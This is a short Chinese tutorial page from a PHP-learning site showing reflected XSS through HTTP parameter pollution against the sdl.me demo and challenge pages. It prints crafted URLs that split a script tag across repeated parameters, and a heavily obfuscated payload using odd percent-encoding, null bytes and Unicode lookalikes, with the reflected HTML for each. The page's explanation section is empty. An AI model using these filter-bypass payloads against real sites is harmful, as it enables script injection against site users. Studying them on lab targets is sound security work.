来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] http://www.sdl.me/xssdemo/getxss.asp?input1=111!DOCTYPE htmlhtmlbodyh1This page is vulnerable to XSS!/h1preInputs:- Get: ?input1=something /predivInput1=111/div/body/......
http://www.sdl.me/xssdemo/getxss.asp?input1=111
<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=111</div> </body> </html>
view-source:http://www.sdl.me/xssdemo/getxss.asp?input1=111&input1=222
<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=111, 222</div> </body> </html> 这种情况下,构造一个XSS http://www.sdl.me/xssdemo/getxss.asp?input1=%3Cscript/&&input1=FOOBAR&input1=%3Ealert(‘@IRSDL’);%3C/script%3E
<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=<script/, >alert('@IRSDL');</script></div> </body> </html>
--------------------------- <!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=<script/, >alert('@IRSDL')</script/</div> </body> </html>
http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=’)1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26<1&input2=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/ http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=’)1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26%3C1&input2=0%3Cale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/ 原理: |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com